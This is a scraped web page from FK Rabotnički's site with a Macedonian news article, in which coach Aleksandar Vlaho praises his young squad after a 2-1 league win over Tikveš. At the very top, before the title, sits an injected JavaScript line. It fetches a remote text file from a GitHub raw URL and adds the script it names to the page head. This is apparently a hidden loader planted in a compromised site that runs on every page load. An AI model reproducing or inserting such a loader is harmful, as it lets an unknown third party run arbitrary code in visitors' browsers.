;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Влахо: Задоволен сум од победата над Тиквеш и од реакцијата на младите фудбалери
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Влахо: Задоволен сум од победата над Тиквеш и од реакцијата на младите фудбалери

Работнички ја оствари втората првенствена победа откако на арената „Тодор Проески“ го совлада Тиквеш со 2-1 во четвртото коло. Во копродукција на Марио и на Лука Станковски, кои беа стрелци на головите, тимот стигна до важен триумф. Тренерот Александар Влахо вели дека младиот тим имаше квалитетен меч и успеа да го надигра Тиквеш.

„Задоволни сме од победата и од бодовите, а посебно од реакцијата на младите фудбалери на Работнички кои добија шанса на овој натпревар. Освен двајца поискусни, сите останати во тимот се на возраст од 18 до 22 години, и може само да радува на каков начин го одиграа мечот. Тиквеш беше жилав противник, но мислам дека Работнички заслужено стигна до победата. Поведовме со голот од пенал на Марио Станковски, а потоа и ние направивме еден наивен пенал и го вративме Тиквеш комплетно во игра. За среќа, многу брзо повторно одговоривме со голот на Лука Станковски, кој повторно ја враќа препознатливата форма од минатата сезона и тоа може само да радува. И сите останати ги исполнија задачите. Сега се подготвуваме за следниот предизвик, гостувањето кај Ренова во Тетово во следното коло. На овој натпревар ќе добијат право на настап уште неколку фудбалери кои ги доведовме како засилувања и верувам дека тоа ќе донесе и дополнителен квалитет за тимот“, изјави шефот на стручниот штаб, Александар Влахо.

Работнички по четири одиграни кола се наоѓа на петтата позиција на табелата со седум освоени бода.